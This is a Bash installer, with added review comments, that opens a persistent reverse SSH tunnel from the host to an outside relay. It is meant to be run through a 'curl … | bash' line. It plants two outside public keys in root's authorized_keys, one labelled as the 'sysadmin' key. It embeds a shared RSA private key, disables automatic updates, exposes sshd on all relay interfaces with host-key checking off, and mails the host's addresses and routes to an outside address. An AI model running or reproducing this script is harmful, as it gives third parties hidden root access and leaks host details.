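#run me:
# curl pathos.tanatos.org/fwdssh | bash
#
# Publishes this host's local sshd on a relay through a persistent reverse SSH
# tunnel. Changes made to the host, in order:
#   - installs openssh-server and telnet if either is missing (Debian/apt)
#   - appends two public keys to /root/.ssh/authorized_keys
#   - writes a client private key to /etc/fwdssh/priv
#   - writes, enables and starts /etc/systemd/system/fwdssh.service
#   - mails the host's addresses and routes to ADMIN_EMAIL
#
# NOTE(review): the usage line above fetches the script over a URL with no
# scheme and pipes it into a root shell, so nothing verifies what is executed.
# Fetch over https, review the file, then run it. The root check below also
# means the pipe target has to be a root shell, not plain `bash`.

if [[ $(id -u) != 0 ]]; then
  echo 'run with sudo' >&2
  # Exit non-zero so a caller can tell that nothing was installed.
  exit 1
fi

# ----------------------------------------------------
# Color-echo.
# Arguments: $1 - message (default: empty)
#            $2 - color name (default: black)
# Outputs:   the message in the given color, no trailing newline, then resets
#            the terminal attributes with tput.
cecho() {
  local black='\E[30m'
  local red='\E[31m'
  local green='\E[32m'
  local yellow='\E[33m'
  local blue='\E[34m'
  local magenta='\E[35m'
  local cyan='\E[36m'
  local white='\E[37m'

  local default_msg=""
  local message=${1:-$default_msg}
  local color=${2:-black}

  # Resolve the color name by indirect expansion instead of eval, and only for
  # the names defined above, so an argument is never evaluated as shell code.
  case "$color" in
    black | red | green | yellow | blue | magenta | cyan | white)
      color=${!color}
      ;;
    *)
      color=$black
      ;;
  esac

  echo -ne "$color""$message"
  tput sgr0
  return
}
# ----------------------------------------------------

# Probes the relay: succeeds when an SSH banner is returned on the port.
# Arguments: $1 - relay host, $2 - port
# Outputs:   the matching banner line, if any
_relay_port_has_sshd() {
  { echo; sleep 2; } | telnet "$1" "$2" 2>/dev/null | grep OpenSSH
}

# Appends a public key to root's authorized_keys unless it is already there.
# Arguments: $1 - full public key line
_install_root_key() {
  local keyfile=/root/.ssh/authorized_keys
  local pubkey=$1

  # -F: the key is data, not a pattern ('.', '+' and '/' occur in base64).
  if grep -qF -- "$pubkey" "$keyfile" 2>/dev/null; then
    echo = key already installed
  else
    # Already running as root (checked at the top), so no sudo is needed.
    mkdir -p /root/.ssh
    chmod 700 /root/.ssh
    printf '%s\n' "$pubkey" >>"$keyfile" && chmod 600 "$keyfile"
  fi
}

if ! command -v sshd &>/dev/null || ! command -v telnet &>/dev/null; then
  # NOTE(review): the timers are disabled, not only stopped, and nothing below
  # re-enables them, so the host stops receiving automatic package updates
  # after this script has run. Re-enable them once the install is done if the
  # intent was only to avoid contention on the apt lock.
  systemctl stop apt-daily.timer
  systemctl stop apt-daily-upgrade.timer
  systemctl disable apt-daily.timer
  systemctl disable apt-daily-upgrade.timer
  systemctl stop unattended-upgrades
  export DEBIAN_FRONTEND=noninteractive
  apt update
  apt install --no-upgrade -y openssh-server telnet \
    -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold"
  dpkg --configure -a
  apt-get -f install \
    -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold"
fi

CONNECT_HOST=167.172.59.39

# Pick a random relay port in 6000-6999 that does not already answer with an
# SSH banner (another host's tunnel).
while :; do
  REMOTE_PORT=$((RANDOM % 1000 + 6000))
  echo = testing REMOTE_PORT "$REMOTE_PORT"
  if _relay_port_has_sshd "$CONNECT_HOST" "$REMOTE_PORT"; then
    echo = REMOTE_PORT "$REMOTE_PORT" busy
  else
    echo = REMOTE_PORT "$REMOTE_PORT" free
    break
  fi
done

# First "Port" directive of the local sshd, falling back to 22.
LOCAL_PORT=$(awk '/^Port/ {print $2; exit}' /etc/ssh/sshd_config)
[ -z "$LOCAL_PORT" ] && LOCAL_PORT=22

export HOME=/root/

# NOTE(review): both functions below grant interactive root login to the
# holders of the matching private keys. Audit /root/.ssh/authorized_keys for
# these two entries when reviewing a host this script has touched.
ezbik_install_ssh_key() {
  _install_root_key "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwwLvA13HtOJhv17pRSDZ2D4SL2PX4/bZt56s7weA2FEAbJfAXnOZLCxnT3bqzHuFrilgO1kXLhWvner5Td4e7JKPYgPPkCwEwWvVIPp9wh7TEgFyQgi39u+N5vQy5lBOTuAJBcc1x4qDTY8w1ebYcGawuciyq3O8OWRFhhlqDt5vArjf2UKikqWF6P1CSJQDW2kYz+PCVVa/dmR2H8XUg9WxmH057rQ/1n5yoXlSCQqI3p7jRd9xn4Lsc9llZddDIClfOZIiiqR1BBZjXXeFrstahaEFGNsQ4hQAu+MwmgC71JoBEkZwfk2MwyC2IOU95XrDh+QB6HhRTxGKlJM4Nw== Dont.delete.it.is.your.linux.sysadmin"
}

diorge_install_ssh_key() {
  _install_root_key "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJtwOcMJb58evMpdkBG3zoE85dLoJ1FW8iwpbqNXzwOR25XJNYqSs78gC2Voam2fIGU+otZw6nnYnVOPqquybIxzFbve0J7d4HrDOFtd1lP8A9l/2AbX1gTCM/gUlhpupfyuf0VEgWMEHrSOujGO/WwvB5lEy/oQJ6J5CDbPThR4VxZojVDsRoEbsEZ1JvgcyhKjoP79o1kXsGGDvMM0XBIIgDTHABG8w0n0y5mPLTAOqRINxtXez1OIiQuSOAPseItiu+O1E4bc0P321o5ibP6AYkTZp0Zq9B3V7Nv/YBvVeQ91w6ig4kcvAcrbFC4yewF4O8DZq6IrOmeTI5OMkR linax"
}

ezbik_install_ssh_key
diorge_install_ssh_key

# Create the key file with restrictive permissions before any key material is
# written into it.
mkdir -p /etc/fwdssh
chmod 700 /etc/fwdssh
touch /etc/fwdssh/priv
chmod 600 /etc/fwdssh/priv

# NOTE(review): the client private key is embedded in the script, so every
# host that runs it holds the same credential and anyone who can read the
# script holds it too. Presumably this key is what authorizes the fwd account
# on the relay - confirm. A per-host key pair generated locally, with the
# relay-side authorized_keys entry limited to port forwarding (for example the
# `restrict` and `permitlisten` options), would contain a leak to one host.
cat >/etc/fwdssh/priv <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0UffzbGFfOWl5Vf5eEE3P7+Lcg3UV7MpCjbHf8fXoNcqwMGt
dDsx80hsei4P8X0GqG2cZIzLGZByIMlpdYV9vMAQwsm7zDb9LcbEQT0qmsJ+nnDt
0wfQfuxk0xlsAbleZQU0wzpvoGKsiSZhuZcZaEm81q4ROd4i0Zw8gErWV3NVNsKl
Qe2Kn0Xm/TrGojn6QI45r6TMn9J/6fKQ+mljdNsvTOAzdBROUP3TRNzLwh1Obhsz
5SKZ4Hb2dpwLfvTHvDmGbpCn80YBSeWTNaut1OuvdPyZsZ4I/UH4RtFD2NN6GabB
FTB5Q79gLVcvHpX7pB876siRjhjvpvheRIFO1wIDAQABAoIBAQCJcmz4SNjk2GaG
I6tCYYKJqaFJvO9y0cXoYWXQ9E0X43i+s/TZW29I2o30CICMF5Lh12tZVmalWYq7
IczTVGLqLjJT2+4tBwhsohiOyD9M+OPz5zMq3/z8/wCQ7CdVUos+SZcHiT961JOA
V+bi3uve5F7Tl+rUWKIBjFzn3T68m1/Pv8QDS6UZPVHX5ITnQSVo2wMqjoin4lXH
JSJj9MyAX8T+6ZBuS17skEubCQMIIOCgoGB95+8DbYQO7+9xYss8x+sQCp4BUmF+
cMYhykffsQ0EWbzxjPLJ0xXIQJGVR9m3NO1SQYO/DW3Gb010zDHKNmTRe1BV6570
Bx+CC9xBAoGBAPiv3uhdI0X3AFi4wnFlOZSYlgTKJbe9ozTGDQo2RvdJThJ+MwQk
pJzAVgAW4CHhZfGfMdLb6MGaOTs8sXM8vQLFsjx/W9WwF9utcSLB1V4x1AChcSSH
0+ggX3FtFThV3MMOEHvlRkpT/zd4UQ+ASA4P0u715aLPcS6CrORFAqyxAoGBANdv
Wehjg23SZw763ALmZCK+pshju1MIx38jTuwMc3+ixts5Yu0N0puwnHOzF6RQ3cGZ
vsyFU+PjVwksf5sL1LN9wopfLeLVQMIgGWOH4N1AYRvWxpsHyAhjtSX3fqFVokad
rpTLtxe/xQf72rfOlvlUWPaJnQNEz7e5BaREZXYHAoGBAJVTRU3RXzTLs/GSP29H
kOOhG7OUjkFeJXmy0nGnVcV2xuJj1M5QEmftNbaoBb1SUpxbMteiJIjbyjG/p+3C
MtxPSU76SnJtYmYOJzjvmucMlHgseHuu85cWmTjKf0tsgzq8XzmF2kcXWNA99q6Q
ILQQ3F+QV2sDlLqQzK/koE6BAoGAOWyv/XbRKKvl1qNdk9RPqsdA87dJzmdPrf7+
YYMsIkCEWxkf2mpN0jwwZ9K8IYuAoMNXjXKYmu0VXRekZ/KuXq3N9k5Kj+UiHtyp
h9NHSBKKD/6e7+ISGtJhDd67vUtzNvl++KCYjFcMsQUcFtSVf55RHF4wIRftel5y
N4gXt28CgYAYiGMsdt4g2h5ru5WSYGIZa1/3iRv9/zFxIXa5YbVOeckugTHAzO8i
yJH43qCg3sEz/WWCfIbUrC6bu95iBGmNC77Zj2HT0EtNVwfCQbsKAcoaUQzIiLtC
E2mJ2nEuLNcvSAnZSTjwwphrKJdmUo95SdiEyhGi/4Lh6lVXe8iZ3Q==
-----END RSA PRIVATE KEY-----
EOF

# Unit that keeps the reverse tunnel up. The three shell values are expanded
# now; the escaped ${...} references are left for systemd to expand from the
# Environment= lines.
#
# NOTE(review): StrictHostKeyChecking=no means the relay's host key is never
# verified; pin it in a known_hosts file shipped with the unit instead.
# NOTE(review): REMOTE_HOST=0.0.0.0 asks the relay to listen on all of its
# interfaces (subject to the relay's GatewayPorts setting), which makes this
# host's sshd reachable from wherever the relay is reachable. The commented
# 127.0.0.1 line keeps the listener local to the relay.
cat >/etc/systemd/system/fwdssh.service <<EOF
[Unit]
After=network.target

[Service]
Environment=LOCAL_PORT=$LOCAL_PORT
Environment=LOCAL_HOST=127.0.0.1
Environment=REMOTE_PORT=$REMOTE_PORT
#Environment=REMOTE_HOST=127.0.0.1
Environment=REMOTE_HOST=0.0.0.0
Environment=CONNECT_HOST=$CONNECT_HOST
Environment=CONNECT_USER=fwd
ExecStart=/usr/bin/ssh \${CONNECT_USER}@\${CONNECT_HOST} -R \${REMOTE_HOST}:\${REMOTE_PORT}:\${LOCAL_HOST}:\${LOCAL_PORT} -N -o ConnectTimeout=6 -o ServerAliveInterval=10 -o ExitOnForwardFailure=yes -o StrictHostKeyChecking=no -i /etc/fwdssh/priv
Type=simple
RestartSec=3
Restart=always
StartLimitInterval=7200s
StartLimitBurst=10000

[Install]
WantedBy=default.target
EOF

systemctl daemon-reload
systemctl enable fwdssh.service
systemctl restart fwdssh.service

# Show the first seconds of the service log, then its load/active state.
timeout 5 journalctl -f -u fwdssh.service -n5

echo = show fwdssh.service
systemctl status fwdssh.service | grep -E 'Loaded|Active'

STATUS2="$CONNECT_HOST $REMOTE_PORT"

# The tunnel counts as working when the relay port now answers with an SSH
# banner.
echo = Test REMOTE_PORT "$CONNECT_HOST:$REMOTE_PORT"
if _relay_port_has_sshd "$CONNECT_HOST" "$REMOTE_PORT"; then
  STATUS1=GOOD
  color=green
else
  STATUS1=bad
  color=red
fi

ADMIN_EMAIL=cool@tanatos.org
MAIL_FROM=f@f.com
MAIL_TO=$ADMIN_EMAIL

set +x

ME=$(curl -m10 -Ss https://ip.tanatos.org/ip.php)

# NOTE(review): the report carries the host name, every interface address and
# the routing table, and is submitted over an smtp:// URL with no TLS
# requirement. Confirm the recipient is meant to receive this and consider
# curl's --ssl-reqd so the message is not sent in clear text.
if {
  echo "From: $MAIL_FROM
To: $MAIL_TO
Subject: fwdssh $HOSTNAME
Date: $(date +'%a, %-d %b %Y %H:%M:%S %z')
"
  echo -e "\n== $STATUS1, $STATUS2"
  echo -e "\n== Ip addresses:"
  ip -o a
  echo -e "\n== Routes:"
  ip ro
  echo -e "\n== GEO\nhttps://ifconfig.co/?ip=$ME\n\n"
} | curl -m10 -Ss smtp://pathos.tanatos.org:587 \
  --mail-from "$MAIL_FROM" --mail-rcpt "$MAIL_TO" --upload-file -; then
  echo "= email sent to $ADMIN_EMAIL"
fi

echo
cecho "= status: $STATUS1\n" "$color"
cecho "= local SSH forwarded to remote port $REMOTE_PORT" blue
echo " << forward this detail!"
echo

echo = Done

# vim: filetype=sh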